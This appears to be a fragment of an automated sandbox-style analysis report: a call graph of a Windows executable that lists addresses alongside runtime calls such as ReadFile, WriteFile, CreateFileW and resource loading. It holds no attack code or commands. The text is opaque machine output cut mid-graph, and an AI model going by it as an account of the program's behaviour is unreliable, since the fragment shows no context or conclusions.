GetModuleHandleW GetProcAddress CreateFileW 105619->105621 105623 fc8af4 __write_nolock 58 API calls 105620->105623 105620->105638 105622 fd853e 105621->105622 105624 fd8572 105622->105624 105625 fd8546 GetLastError 105622->105625 105623->105638 105624->105640 105626 fc8b07 __dosmaperr 58 API calls 105625->105626 105627 fd8552 105626->105627 105631 fcd43d __free_osfhnd 59 API calls 105627->105631 105628 fd0add __close_nolock 61 API calls 105628->105638 105629 fd0e5b 70 API calls __read_nolock 105629->105638 105630 fd823c 105632 fd97a2 __chsize_nolock 82 API calls 105630->105632 105630->105638 105631->105624 105632->105630 105633 fd18c1 60 API calls __lseeki64_nolock 105633->105638 105634 fcd886 __write 78 API calls 105634->105638 105635 fd83c1 105636 fd0add __close_nolock 61 API calls 105635->105636 105637 fd83c8 105636->105637 105639 fc8b28 __wfsopen 58 API calls 105637->105639 105638->105617 105638->105628 105638->105629 105638->105630 105638->105633 105638->105634 105638->105635 105639->105640 105640->105570 105641->105560 105642->105564 105643->105564 105645 fa4b83 105644->105645 105646 fa4c3f LoadLibraryA 105644->105646 105645->105446 105645->105449 105646->105645 105647 fa4c50 GetProcAddress 105646->105647 105647->105645 105649 fa4ea3 FindResourceExW 105648->105649 105653 fa4ec0 105648->105653 105650 fdd933 LoadResource 105649->105650 105649->105653 105651 fdd948 SizeofResource 105650->105651 105650->105653 105652 fdd95c LockResource 105651->105652 105651->105653 105652->105653 105653->105455 105655 fdd9ab 105654->105655 105656 fa4ef4 105654->105656 105660 fc584d 105656->105660 105658 fa4f02 105658->105464 105659->105455 105661 fc5859 __wfsopen 105660->105661 105662 fc586b 105661->105662 105664 fc5891 105661->105664 105673 fc8b28 58 API calls __getptd_noexit 105662->105673 105675 fc6c11 105664->105675 105665 fc5870 105674 fc8db6 9 API calls __wfsopen 105665->105674 105668 fc5897 105681 fc57be 83 API calls 5 library calls 105668->105681 105670 fc58a6 105682 fc58c8 LeaveCriticalSection LeaveCriticalSection _fprintf 105670->105682 105672 fc587b __wfsopen 105672->105658 105673->105665 105674->105672 105676 fc6c21 105675->105676 105677 fc6c43 EnterCriticalSection 105675->105677 105676->105677 105678 fc6c29 105676->105678 105679 fc6c39 105677->105679 105680 fc9c0b __lock 58 API calls 105678->105680 105679->105668 105680->105679 105681->105670 105682->105672 105686 fc55fd 105683->105686 105685 fa4f2e 105685->105474 105687 fc5609 __wfsopen 105686->105687 105688 fc564c 105687->105688 105689 fc5644 __wfsopen 105687->105689 105695 fc561f _memset 105687->105695 105690 fc6c11 __lock_file 59 API calls 105688->105690 105689->105685 105691 fc5652 105690->105691 105699 fc541d 105691->105699 105693 fc5639 105714 fc8db6 9 API calls __wfsopen 105693->105714 105713 fc8b28 58 API calls __getptd_noexit 105695->105713 105701 fc5438 _memset 105699->105701 105705 fc5453 105699->105705 105700 fc5443 105811 fc8b28 58 API calls __getptd_noexit 105700->105811 105701->105700 105701->105705 105707 fc5493 105701->105707 105703 fc5448 105812 fc8db6 9 API calls __wfsopen 105703->105812 105715 fc5686 LeaveCriticalSection LeaveCriticalSection _fprintf 105705->105715 105707->105705 105708 fc55a4 _memset 105707->105708 105716 fc46e6 105707->105716 105723 fd0e5b 105707->105723 105791 fd0ba7 105707->105791 105813 fd0cc8 58 API calls 3 library calls 105707->105813 105814 fc8b28 58 API calls __getptd_noexit 105708->105814 105713->105693 105714->105689 105715->105689 105717 fc4705 105716->105717 105718 fc46f0 105716->105718 105717->105707 105815 fc8b28 58 API calls __getptd_noexit 105718->105815 105720 fc46f5 105816 fc8db6 9 API calls __wfsopen 105720->105816 105722 fc4700 105722->105707 105724 fd0e7c 105723->105724 105725 fd0e93 105723->105725 105826 fc8af4 58 API calls __getptd_noexit 105724->105826 105727 fd15cb 105725->105727 105732 fd0ecd 105725->105732 105842 fc8af4 58 API calls __getptd_noexit 105727->105842 105729 fd0e81 105827 fc8b28 58 API calls __getptd_noexit 105729->105827 105730 fd15d0 105843 fc8b28 58 API calls __getptd_noexit 105730->105843 105734 fd0ed5 105732->105734 105739 fd0eec 105732->105739 105828 fc8af4 58 API calls __getptd_noexit 105734->105828 105735 fd0ee1 105844 fc8db6 9 API calls __wfsopen 105735->105844 105737 fd0eda 105829 fc8b28 58 API calls __getptd_noexit 105737->105829 105740 fd0f01 105739->105740 105743 fd0f1b 105739->105743 105744 fd0f39 105739->105744 105771 fd0e88 105739->105771 105830 fc8af4 58 API calls __getptd_noexit 105740->105830 105743->105740 105748 fd0f26 105743->105748 105831 fc881d 58 API calls 2 library calls 105744->105831 105746 fd0f49 105749 fd0f6c 105746->105749 105750 fd0f51 105746->105750 105817 fd5c6b 105748->105817 105834 fd18c1 60 API calls 3 library calls 105749->105834 105832 fc8b28 58 API calls __getptd_noexit 105750->105832 105751 fd103a 105753 fd10b3 ReadFile 105751->105753 105758 fd1050 GetConsoleMode 105751->105758 105756 fd10d5 105753->105756 105757 fd1593 GetLastError 105753->105757 105755 fd0f56 105833 fc8af4 58 API calls __getptd_noexit 105755->105833 105756->105757 105764 fd10a5 105756->105764 105760 fd1093 105757->105760 105761 fd15a0 105757->105761 105762 fd1064 105758->105762 105763 fd10b0 105758->105763 105774 fd1099 105760->105774 105835 fc8b07 58 API calls 3 library calls 105760->105835 105840 fc8b28 58 API calls __getptd_noexit 105761->105840 105762->105763 105766 fd106a ReadConsoleW 105762->105766 105763->105753 105773 fd1377 105764->105773 105764->105774 105776 fd110a 105764->105776 105766->105764 105768 fd108d GetLastError 105766->105768 105767 fd15a5 105841 fc8af4 58 API calls __getptd_noexit 105767->105841 105768->105760 105771->105707 105772 fc2d55 _free 58 API calls 105772->105771 105773->105774 105778 fd147d ReadFile 105773->105778 105774->105771 105774->105772 105777 fd1176 ReadFile 105776->105777 105782 fd11f7 105776->105782 105779 fd1197 GetLastError 105777->105779 105789 fd11a1 105777->105789 105784 fd14a0 GetLastError 105778->105784 105790 fd14ae 105778->105790 105779->105789 105780 fd12b4 105785 fd1264 MultiByteToWideChar 105780->105785 105838 fd18c1 60 API calls 3 library calls 105780->105838 105781 fd12a4 105837 fc8b28 58 API calls __getptd_noexit 105781->105837 105782->105774 105782->105780 105782->105781 105782->105785 105784->105790 105785->105768 105785->105774 105789->105776 105836 fd18c1 60 API calls 3 library calls 105789->105836 105790->105773 105839 fd18c1 60 API calls 3 library calls 105790->105839 105792 fd0bb2 105791->105792 105795 fd0bc7 105791->105795 105878 fc8b28 58 API calls __getptd_noexit 105792->105878 105794 fd0bb7 105879 fc8db6 9 API calls __wfsopen 105794->105879 105797 fd0bfc 105795->105797 105803 fd0bc2 105795->105803 105880 fd5fe4 58 API calls __malloc_crt 105795->105880 105799 fc46e6 __fflush_nolock 58 API calls 105797->105799 105800 fd0c10 105799->105800 105845 fd0d47 105800->105845 105802 fd0c17 105802->105803 105804 fc46e6 __fflush_nolock 58 API calls 105802->105804 105803->105707 105805 fd0c3a 105804->105805 105805->105803 105806 fc46e6 __fflush_nolock 58 API calls 105805->105806 105807 fd0c46 105806->105807 105807->105803 105808 fc46e6 __fflush_nolock 58 API calls 105807->105808 105809 fd0c53 105808->105809 105810 fc46e6 __fflush_nolock 58 API calls 105809->105810 105810->105803 105811->105703 105812->105705 105813->105707 105814->105703 105815->105720 105816->105722 105818 fd5c76 105817->105818 105819 fd5c83 105817->105819 105820 fc8b28 __wfsopen 58 API calls 105818->105820 105822 fd5c8f 105819->105822 105823 fc8b28 __wfsopen 58 API calls 105819->105823 105821 fd5c7b 105820->105821 105821->105751 105822->105751 105824 fd5cb0 105823->105824 105825 fc8db6 __wfsopen 9 API calls 105824->105825 105825->105821 105826->105729 105827->105771 105828->105737 105829->105735 105830->105737 105831->105746 105832->105755 105833->105771 105834->105748 105835->105774 105836->105789 105837->105774 105838->105785 105839->105790 105840->105767 105841->105774 105842->105730 105843->105735 105844->105771 105846 fd0d53 __wfsopen 105845->105846 105847 fd0d77 105846->105847 105848 fd0d60 105846->105848 105850 fd0e3b 105847->105850 105851 fd0d8b 105847->105851 105849 fc8af4 __write_nolock 58 API calls 105848->105849 105853 fd0d65 105849->105853 105852 fc8af4 __write_nolock 58 API calls 105850->105852 105854 fd0da9 105851->105854 105855 fd0db6 105851->105855 105856 fd0dae 105852->105856 105857 fc8b28 __wfsopen 58 API calls 105853->105857 105858 fc8af4 __write_nolock 58 API calls 105854->105858 105859 fd0dd8 105855->105859 105860 fd0dc3 105855->105860 105863 fc8b28 __wfsopen 58 API calls 105856->105863 105867 fd0d6c __wfsopen 105857->105867 105858->105856 105862 fcd206 ___lock_fhandle 59 API calls 105859->105862 105861 fc8af4 __write_nolock 58 API calls 105860->105861 105864 fd0dc8 105861->105864 105865 fd0dde 105862->105865 105866 fd0dd0 105863->105866 105868 fc8b28 __wfsopen 58 API calls 105864->105868 105869 fd0e04 105865->105869 105870 fd0df1 105865->105870 105873 fc8db6 __wfsopen 9 API calls 105866->105873 105867->105802 105868->105866 105871 fc8b28 __wfsopen 58 API calls 105869->105871 105872 fd0e5b __read_nolock 70 API calls 105870->105872 105874 fd0e09 105871->105874 105875 fd0dfd 105872->105875 105873->105867 105876 fc8af4 __write_nolock 58 API calls 105874->105876 105877 fd0e33 __read LeaveCriticalSection 105875->105877 105876->105875 105877->105867 105878->105794 105879->105803 105880->105797 105884 fc520a GetSystemTimeAsFileTime 105881->105884 105883 1008f6e 105883->105476 105885 fc5238 __aulldiv 105884->105885 105885->105883 105887 fc5c6c __wfsopen 105886->105887 105888 fc5c7e 105887->105888 105889 fc5c93 105887->105889 105900 fc8b28 58 API calls __getptd_noexit 105888->105900 105891 fc6c11 __lock_file 59 API calls 105889->105891 105893 fc5c99 105891->105893 105892 fc5c83 105901 fc8db6 9 API calls __wfsopen 105892->105901 105902 fc58d0 67 API calls 5 library calls 105893->105902 105896 fc5c8e __wfsopen 105896->105481 105897 fc5ca4 105903 fc5cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 105897->105903 105899 fc5cb6 105899->105896 105900->105892 105901->105896 105902->105897 105903->105899 105904->105379 105905->105381 105906->105378 105907->105386 105908->105390 105913 1009748 __tzset_nolock _wcscmp 105909->105913 105910 10095dc 105910->105397 105910->105424 105911 fa4f0b 74 API calls 105911->105913 105912 1009109 GetSystemTimeAsFileTime 105912->105913 105913->105910 105913->105911 105913->105912 105914 fa4ee5 85 API calls 105913->105914 105914->105913 105916 1008b1f 105915->105916 105917 1008b11 105915->105917 105919 1008b64 105916->105919 105920 fc525b 115 API calls 105916->105920 105930 1008b28 105916->105930 105918 fc525b 115 API calls 105917->105918 105918->105916 105946 1008d91 105919->105946 105922 1008b49 105920->105922 105922->105919 105924 1008b52 105922->105924 105923 1008ba8 105925 1008bac 105923->105925 105926 1008bcd 105923->105926 105927 fc53a6 __fcloseall 83 API calls 105924->105927 105924->105930 105929 1008bb9 105925->105929 105932 fc53a6 __fcloseall 83 API calls 105925->105932 105950 10089a9 105926->105950 105927->105930 105929->105930 105935 fc53a6 __fcloseall 83 API calls 105929->105935 105930->105426 105932->105929 105933 1008bfb 105959 1008c2b 105933->105959 105934 1008bdb 105937 fc53a6 __fcloseall 83 API calls 105934->105937 105938 1008be8 105934->105938 105935->105930 105937->105938 105938->105930 105940 fc53a6 __fcloseall 83 API calls 105938->105940 105940->105930 105943 1008c16 105943->105930 105945 fc53a6 __fcloseall 83 API calls 105943->105945 105945->105930 105947 1008db6 105946->105947 105948 1008d9f __tzset_nolock _memmove 105946->105948 105949 fc55e2 __fread_nolock 74 API calls 105947->105949 105948->105923 105949->105948 105951 fc571c __crtGetStringTypeA_stat 58 API calls 105950->105951 105952 10089b8 105951->105952 105953 fc571c __crtGetStringTypeA_stat 58 API calls 105952->105953 105954 10089cc 105953->105954 105955 fc571c __crtGetStringTypeA_stat 58 API calls 105954->105955 105956 10089e0 105955->105956 105957 1008d0d 58 API calls 105956->105957 105958 10089f3 105956->105958 105957->105958 105958->105933 105958->105934 105963 1008c40 105959->105963 105960 1008cf8 105992 1008f35 105960->105992 105961 1008a05 74 API calls 105961->105963 105963->105960 105963->105961 105966 1008c02 105963->105966 105988 1008e12 105963->105988 105996 1008aa1 74 API calls 105963->105996 105967 1008d0d 105966->105967 105968 1008d20 105967->105968 105969 1008d1a 105967->105969 105971 1008d31 105968->105971 105973 fc2d55 _free 58 API calls 105968->105973 105970 fc2d55 _free 58 API calls 105969->105970 105970->105968 105972 1008c09 105971->105972 105974 fc2d55 _free 58 API calls 105971->105974 105972->105943 105975 fc53a6 105972->105975 105973->105971 105974->105972 105976 fc53b2 __wfsopen 105975->105976 105977 fc53de 105976->105977 105978 fc53c6 105976->105978 105981 fc6c11 __lock_file 59 API calls 105977->105981 105984 fc53d6 __wfsopen 105977->105984 106045 fc8b28 58 API calls __getptd_noexit 105978->106045 105980 fc53cb 106046 fc8db6 9 API calls __wfsopen 105980->106046 105983 fc53f0 105981->105983 106029 fc533a 105983->106029 105984->105943 105989 1008e21 105988->105989 105990 1008e61 105988->105990 105989->105963 105990->105989 105997 1008ee8 105990->105997 105993 1008f42 105992->105993 105994 1008f53 105992->105994 105995 fc4863 80 API calls 105993->105995 105994->105966 105995->105994 105996->105963 105998 1008f14 105997->105998 105999 1008f25 105997->105999 106001 fc4863 105998->106001 105999->105990 106002 fc486f __wfsopen 106001->106002 106003 fc488d 106002->106003 106004 fc48a5 106002->106004 106006 fc489d __wfsopen 106002->106006 106026 fc8b28 58 API calls __getptd_noexit 106003->106026 106007 fc6c11 __lock_file 59 API calls 106004->106007 106006->105999 106008 fc48ab 106007->106008 106014 fc470a 106008->106014 106009 fc4892 106027 fc8db6 9 API calls __wfsopen 106009->106027 106015 fc4737 106014->106015 106017 fc4719 106014->106017 106028 fc48dd LeaveCriticalSection LeaveCriticalSection _fprintf 106015->106028 106016 fc4727 106018 fc8b28 __wfsopen 58 API calls 106016->106018 106017->106015 106017->106016 106024 fc4751 _memmove 106017->106024 106019 fc472c 106018->106019 106020 fc8db6 __wfsopen 9 API calls 106019->106020 106020->106015 106021 fcae1e __flsbuf 78 API calls 106021->106024 106022 fc4a3d __flush 78 API calls 106022->106024 106023 fc46e6 __fflush_nolock 58 API calls 106023->106024 106024->106015 106024->106021 106024->106022 106024->106023 106025 fcd886 __write 78 API calls 106024->106025 106025->106024 106026->106009 106027->106006 106028->106006 106030 fc5349 106029->106030 106033 fc535d 106029->106033 106084 fc8b28 58 API calls __getptd_noexit 106030->106084 106032 fc5359 106047 fc5415 LeaveCriticalSection LeaveCriticalSection _fprintf 106032->106047 106033->106032 106048 fc4a3d 106033->106048 106034 fc534e 106085 fc8db6 9 API calls __wfsopen 106034->106085 106040 fc46e6 __fflush_nolock 58 API calls 106041 fc5377 106040->106041 106058 fd0a02 106041->106058 106043 fc537d 106043->106032 106044 fc2d55 _free 58 API calls 106043->106044 106044->106032 106045->105980 106046->105984 106047->105984 106049 fc4a50 106048->106049 106053 fc4a74 106048->106053 106050 fc46e6 __fflush_nolock 58 API calls 106049->106050 106049->106053 106051 fc4a6d 106050->106051 106086 fcd886 106051->106086 106054 fd0b77 106053->106054 106055 fc5371 106054->106055 106056 fd0b84 106054->106056 106055->106040 106056->106055 106057 fc2d55 _free 58 API calls 106056->106057 106057->106055 106059 fd0a0e __wfsopen 106058->106059 106060 fd0a1b 106059->106060 106061 fd0a32 106059->106061 106211 fc8af4 58 API calls __getptd_noexit 106060->106211 106062 fd0abd 106061->106062 106065 fd0a42 106061->106065 106216 fc8af4 58 API calls __getptd_noexit 106062->106216 106064 fd0a20 106212 fc8b28 58 API calls __getptd_noexit 106064->106212 106068 fd0a6a 106065->106068 106069 fd0a60 106065->106069 106072 fcd206 ___lock_fhandle 59 API calls 106068->106072 106213 fc8af4 58 API calls __getptd_noexit 106069->106213 106070 fd0a65 106217 fc8b28 58 API calls __getptd_noexit 106070->106217 106074 fd0a70 106072->106074 106076 fd0a8e 106074->106076 106077 fd0a83 106074->106077 106075 fd0ac9 106218 fc8db6 9 API calls __wfsopen 106075->106218 106214 fc8b28 58 API calls __getptd_noexit 106076->106214 106196 fd0add 106077->106196 106081 fd0a27 __wfsopen 106081->106043 106082 fd0a89 106215 fd0ab5 LeaveCriticalSection __unlock_fhandle 106082->106215 106084->106034 106085->106032 106087 fcd892 __wfsopen 106086->106087 106088 fcd89f 106087->106088 106089 fcd8b6 106087->106089 106187 fc8af4 58 API calls __getptd_noexit 106088->106187 106091 fcd955 106089->106091 106093 fcd8ca 106089->106093 106193 fc8af4 58 API calls __getptd_noexit 106091->106193 106092 fcd8a4 106188 fc8b28 58 API calls __getptd_noexit 106092->106188 106096 fcd8e8 106093->106096 106097 fcd8f2 106093->106097 106189 fc8af4 58 API calls __getptd_noexit 106096->106189 106114 fcd206 106097->106114 106100 fcd8ed 106194 fc8b28 58 API calls __getptd_noexit 106100->106194 106101 fcd8f8 106103 fcd91e 106101->106103 106104 fcd90b 106101->106104 106190 fc8b28 58 API calls __getptd_noexit 106103->106190 106123 fcd975 106104->106123 106105 fcd961 106195 fc8db6 9 API calls __wfsopen 106105->106195 106109 fcd917 106192 fcd94d LeaveCriticalSection __unlock_fhandle 106109->106192 106110 fcd8ab __wfsopen 106110->106053 106111 fcd923 106191 fc8af4 58 API calls __getptd_noexit 106111->106191 106115 fcd212 __wfsopen 106114->106115 106116 fcd261 EnterCriticalSection 106115->106116 106117 fc9c0b __lock 58 API calls 106115->106117 106118 fcd287 __wfsopen 106116->106118 106119 fcd237 106117->106119 106118->106101 106120 fcd24f 106119->106120 106121 fc9e2b __mtinitlocks InitializeCriticalSectionAndSpinCount 106119->106121 106122 fcd28b ___lock_fhandle LeaveCriticalSection 106120->106122 106121->106120 106122->106116 106124 fcd982 __write_nolock 106123->106124 106125 fcd9c1 106124->106125 106128 fcd9e0 106124->106128 106157 fcd9b6 106124->106157 106127 fc8af4 __write_nolock 58 API calls 106125->106127 106126 fcc5f6 __write_nolock 6 API calls 106129 fce1d6 106126->106129 106130 fcd9c6 106127->106130 106131 fcda38 106128->106131 106132 fcda1c 106128->106132 106129->106109 106133 fc8b28 __wfsopen 58 API calls 106130->106133 106134 fcda51 106131->106134 106137 fd18c1 __lseeki64_nolock 60 API calls 106131->106137 106135 fc8af4 __write_nolock 58 API calls 106132->106135 106136 fcd9cd 106133->106136 106138 fd5c6b __write_nolock 58 API calls 106134->106138 106139 fcda21 106135->106139 106141 fc8db6 __wfsopen 9 API calls 106136->106141 106137->106134 106142 fcda5f 106138->106142 106140 fc8b28 __wfsopen 58 API calls 106139->106140 106143 fcda28 106140->106143 106141->106157 106144 fcddb8 106142->106144 106150 fc99ac _LocaleUpdate::_LocaleUpdate 58 API calls 106142->106150 106145 fc8db6 __wfsopen 9 API calls 106143->106145 106146 fce14b WriteFile 106144->106146 106147 fcddd6 106144->106147 106145->106157 106148 fcddab GetLastError 106146->106148 106159 fcdd78 106146->106159 106149 fcdefa 106147->106149 106156 fcddec 106147->106156 106148->106159 106160 fcdfef 106149->106160 106162 fcdf05 106149->106162 106152 fcda8b GetConsoleMode 106150->106152 106151 fce184 106151->106157 106158 fc8b28 __wfsopen 58 API calls 106151->106158 106152->106144 106153 fcdaca 106152->106153 106153->106144 106154 fcdada GetConsoleCP 106153->106154 106154->106151 106182 fcdb09 106154->106182 106155 fcde5b WriteFile 106155->106148 106161 fcde98 106155->106161 106156->106151 106156->106155 106157->106126 106163 fce1b2 106158->106163 106159->106151 106159->106157 106164 fcded8 106159->106164 106160->106151 106165 fce064 WideCharToMultiByte 106160->106165 106161->106156 106166 fcdebc 106161->106166 106162->106151 106167 fcdf6a WriteFile 106162->106167 106168 fc8af4 __write_nolock 58 API calls 106163->106168 106169 fce17b 106164->106169 106170 fcdee3 106164->106170 106165->106148 106180 fce0ab 106165->106180 106166->106159 106167->106148 106172 fcdfb9 106167->106172 106168->106157 106171 fc8b07 __dosmaperr 58 API calls 106169->106171 106173 fc8b28 __wfsopen 58 API calls 106170->106173 106171->106157 106172->106159 106172->106162 106172->106166 106174 fcdee8 106173->106174 106176 fc8af4 __write_nolock 58 API calls 106174->106176 106175 fce0b3 WriteFile 106178 fce106 GetLastError 106175->106178 106175->106180 106176->106157 106177 fc35f5 __write_nolock 58 API calls 106177->106182 106178->106180 106179 fd62ba 60 API calls __write_nolock 106179->106182 106180->106159 106180->106160 106180->106166 106180->106175 106181 fd7a5e WriteConsoleW CreateFileW __putwch_nolock 106185 fcdc5f 106181->106185 106182->106159 106182->106177 106182->106179 106183 fcdbf2 WideCharToMultiByte 106182->106183 106182->106185 106183->106159 106184 fcdc2d WriteFile 106183->106184 106184->106148 106184->106185 106185->106148 106185->106159 106185->106181 106185->106182 106186 fcdc87 WriteFile 106185->106186 106186->106148 106186->106185 106187->106092 106188->106110 106189->106100 106190->106111 106191->106109 106192->106110 106193->106100 106194->106105 106195->106110 106219 fcd4c3 106196->106219 106198 fd0b41 106232 fcd43d 59 API calls 2 library calls 106198->106232 106200 fd0aeb 106200->106198 106203 fcd4c3 __close_nolock 58 API calls 106200->106203 106210 fd0b1f 106200->106210 106201 fcd4c3 __close_nolock 58 API calls 106204 fd0b2b CloseHandle 106201->106204 106202 fd0b49 106205 fd0b6b 106202->106205 106233 fc8b07 58 API calls 3 library calls 106202->106233 106206 fd0b16 106203->106206 106204->106198 106207 fd0b37 GetLastError 106204->106207 106205->106082 106209 fcd4c3 __close_nolock 58 API calls 106206->106209 106207->106198 106209->106210 106210->106198 106210->106201 106211->106064 106212->106081 106213->106070 106214->106082 106215->106081 106216->106070 106217->106075 106218->106081 106220 fcd4ce 106219->106220 106221 fcd4e3 106219->106221 106222 fc8af4 __write_nolock 58 API calls 106220->106222 106223 fc8af4 __write_nolock 58 API calls 106221->106223 106227 fcd508 106221->106227 106224 fcd4d3 106222->106224 106225 fcd512 106223->106225 106226 fc8b28 __wfsopen 58 API calls 106224->106226 106228 fc8b28 __wfsopen 58 API calls 106225->106228 106229 fcd4db 106226->106229 106227->106200 106230 fcd51a 106228->106230 106229->106200 106231 fc8db6 __wfsopen 9 API calls 106230->106231 106231->106229 106232->106202 106233->106205 106235 fc079e __write_nolock 106234->106235 106236 fc079f GetLongPathNameW 106235->106236 106237 fa7bcc 59 API calls 106236->106237 106238 fa72bd 106237->106238 106239 fa700b 106238->106239 106240 fa7667 59 API calls 106239->106240 106241 fa701d 106240->106241 106242 fa4750 60 API calls 106241->106242 106243 fa7028 106242->106243 106244 fa7033 106243->106244 106249 fde885 106243->106249 106246 fa3f74 59 API calls 106244->106246 106247 fa703f 106246->106247 106286 fa34c2 106247->106286 106250 fde89f 106249->106250 106292 fa7908 61 API calls 106249->106292 106251 fa7052 Mailbox 106251->105219 106253 fa4ddd 136 API calls 106252->106253 106254 fa688f 106253->106254 106255 fde031 106254->106255 106256 fa4ddd 136 API calls 106254->106256 106257 100955b 122 API calls 106255->106257 106258 fa68a3 106256->106258 106259 fde046 106257->106259 106258->106255 106260 fa68ab 106258->106260 106261 fde04a 106259->106261 106262 fde067 106259->106262 106264 fa68b7 106260->106264 106265 fde052 106260->106265 106266 fa4e4a 84 API calls 106261->106266 106263 fc0db6 Mailbox 59 API calls 106262->106263 106285 fde0ac Mailbox 106263->106285 106293 fa6a8c 106264->106293 106386 10042f8 90 API calls _wprintf 106265->106386 106266->106265 106270 fde060 106270->106262 106271 fde260 106272 fc2d55 _free 58 API calls 106271->106272 106273 fde268 106272->106273 106274 fa4e4a 84 API calls 106273->106274 106279 fde271 106274->106279 106278 fc2d55 _free 58 API calls 106278->106279 106279->106278 106280 fa4e4a 84 API calls 106279->106280 106392 fff7a1 89 API calls 4 library calls 106279->106392 106280->106279 106282 fa7de1 59 API calls 106282->106285 106285->106271 106285->106279 106285->106282 106387 fff73d 59 API calls 2 library calls 106285->106387 106388 fff65e 61 API calls 2 library calls 106285->106388 106389 100737f 59 API calls Mailbox 106285->106389 106390 fa750f 59 API calls 2 library calls 106285->106390 106391 fa735d 59 API calls Mailbox 106285->106391 106287 fa34d4 106286->106287 106291 fa34f3 _memmove 106286->106291 106290 fc0db6 Mailbox 59 API calls 106287->106290 106288 fc0db6 Mailbox 59 API calls 106289 fa350a 106288->106289 106289->106251 106290->106291 106291->106288 106292->106249 106294 fde41e 106293->106294 106295 fa6ab5 106293->106295 106465 fff7a1 89 API calls 4 library calls 106294->106465 106398 fa57a6 60 API calls Mailbox 106295->106398 106298 fde431 106466 fff7a1 89 API calls 4 library calls 106298->106466 106299 fa6ad7 106399 fa57f6 67 API calls 106299->106399 106301 fa6aec 106301->106298 106303 fa6af4 106301->106303 106305 fa7667 59 API calls 106303->106305 106304 fde44d 106308 fa6b61 106304->106308 106306 fa6b00 106305->106306 106400 fc0957 60 API calls __write_nolock 106306->106400 106310 fa6b6f 106308->106310 106311 fde460 106308->106311 106309 fa6b0c 106312 fa7667 59 API calls 106309->106312 106314 fa7667 59 API calls 106310->106314 106313 fa5c6f CloseHandle 106311->106313 106315 fa6b18 106312->106315 106316 fde46c 106313->106316 106317 fa6b78 106314->106317 106318 fa4750 60 API calls 106315->106318 106319 fa4ddd 136 API calls 106316->106319 106320 fa7667 59 API calls 106317->106320 106321 fa6b26 106318->106321 106322 fde488 106319->106322 106323 fa6b81 106320->106323 106401 fa5850 ReadFile SetFilePointerEx 106321->106401 106326 fde4b1 106322->106326 106330 100955b 122 API calls 106322->106330 106403 fa459b 106323->106403 106467 fff7a1 89 API calls 4 library calls 106326->106467 106327 fa6b98 106331 fa7b2e 59 API calls 106327->106331 106329 fa6b52 106402 fa5aee SetFilePointerEx SetFilePointerEx 106329->106402 106334 fde4a4 106330->106334 106337 fa6ba9 SetCurrentDirectoryW 106331->106337 106332 fde4c8 106364 fa6d0c Mailbox 106332->106364 106335 fde4cd 106334->106335 106336 fde4ac 106334->106336 106339 fa4e4a 84 API calls 106335->106339 106338 fa4e4a 84 API calls 106336->106338 106342 fa6bbc Mailbox 106337->106342 106338->106326 106340 fde4d2 106339->106340 106341 fc0db6 Mailbox 59 API calls 106340->106341 106348 fde506 106341->106348 106344 fc0db6 Mailbox 59 API calls 106342->106344 106346 fa6bcf 106344->106346 106345 fa3bbb 106345->105078 106345->105087 106347 fa522e 59 API calls 106346->106347 106375 fa6bda Mailbox __wsetenvp 106347->106375 106468 fa750f 59 API calls 2 library calls 106348->106468 106350 fa6ce7 106461 fa5c6f 106350->106461 106351 fde740 106474 10072df 59 API calls Mailbox 106351->106474 106357 fde762 106475 101fbce 59 API calls 2 library calls 106357->106475 106360 fde76f 106362 fc2d55 _free 58 API calls 106360->106362 106361 fde7d9 106478 fff7a1 89 API calls 4 library calls 106361->106478 106362->106364 106393 fa57d4 106364->106393 106369 fde7d1 106477 fff5f7 59 API calls 4 library calls 106369->106477 106372 fa7de1 59 API calls 106372->106375 106375->106350 106375->106361 106375->106369 106375->106372 106454 fa586d 67 API calls _wcscpy 106375->106454 106455 fa6f5d GetStringTypeW 106375->106455 106456 fa6ecc 60 API calls __wcsnicmp 106375->106456 106457 fa6faa GetStringTypeW __wsetenvp 106375->106457 106458 fc363d GetStringTypeW _iswctype 106375->106458 106459 fa68dc 165 API calls 3 library calls 106375->106459 106460 fa7213 59 API calls Mailbox 106375->106460 106376 fa7de1 59 API calls 106383 fde54f Mailbox 106376->106383 106380 fde792 106476 fff7a1 89 API calls 4 library calls 106380->106476 106382 fde7ab 106384 fc2d55 _free 58 API calls 106382->106384 106383->106351 106383->106376 106383->106380 106469 fff73d 59 API calls 2 library calls 106383->106469 106470 fff65e 61 API calls 2 library calls 106383->106470 106471 100737f 59 API calls Mailbox 106383->106471 106472 fa750f 59 API calls 2 library calls 106383->106472 106473 fa7213 59 API calls Mailbox 106383->106473 106385 fde7be 106384->106385 106385->106364 106386->106270 106387->106285 106388->106285 106389->106285 106390->106285 106391->106285 106392->106279 106394 fa5c6f CloseHandle 106393->106394 106395 fa57dc Mailbox 106394->106395 106396 fa5c6f CloseHandle 106395->106396 106397 fa57eb 106396->106397 106397->106345 106398->106299 106399->106301 106400->106309 106401->106329 106402->106308 106404 fa7667 59 API calls 106403->106404 106405 fa45b1 106404->106405 106406 fa7667 59 API calls 106405->106406 106407 fa45b9 106406->106407 106408 fa7667 59 API calls 106407->106408 106409 fa45c1 106408->106409 106410 fa7667 59 API calls 106409->106410 106411 fa45c9 106410->106411 106412 fa45fd 106411->106412 106413 fdd4d2 106411->106413 106414 fa784b 59 API calls 106412->106414 106415 fa8047 59 API calls 106413->106415 106416 fa460b 106414->106416 106417 fdd4db 106415->106417 106418 fa7d2c 59 API calls 106416->106418 106419 fa7d8c 59 API calls 106417->106419 106420 fa4615 106418->106420 106421 fa4640 106419->106421 106420->106421 106422 fa784b 59 API calls 106420->106422 106423 fa4680 106421->106423 106426 fa465f 106421->106426 106436 fdd4fb 106421->106436 106425 fa4636 106422->106425 106424 fa784b 59 API calls 106423->106424 106427 fa4691 106424->106427 106428 fa7d2c 59 API calls 106425->106428 106430 fa79f2 59 API calls 106426->106430 106431 fa46a3 106427->106431 106434 fa8047 59 API calls 106427->106434 106428->106421 106429 fdd5cb 106432 fa7bcc 59 API calls 106429->106432 106433 fa4669 106430->106433 106435 fa46b3 106431->106435 106438 fa8047 59 API calls 106431->106438 106449 fdd588 106432->106449 106433->106423 106437 fa784b 59 API calls 106433->106437 106434->106431 106440 fa46ba 106435->106440 106441 fa8047 59 API calls 106435->106441 106436->106429 106439 fdd5b4 106436->106439 106448 fdd532 106436->106448 106437->106423 106438->106435 106439->106429 106444 fdd59f 106439->106444 106442 fa8047 59 API calls 106440->106442 106451 fa46c1 Mailbox 106440->106451 106441->106440 106442->106451 106443 fa79f2 59 API calls 106443->106449 106446 fa7bcc 59 API calls 106444->106446 106445 fdd590 106447 fa7bcc 59 API calls 106445->106447 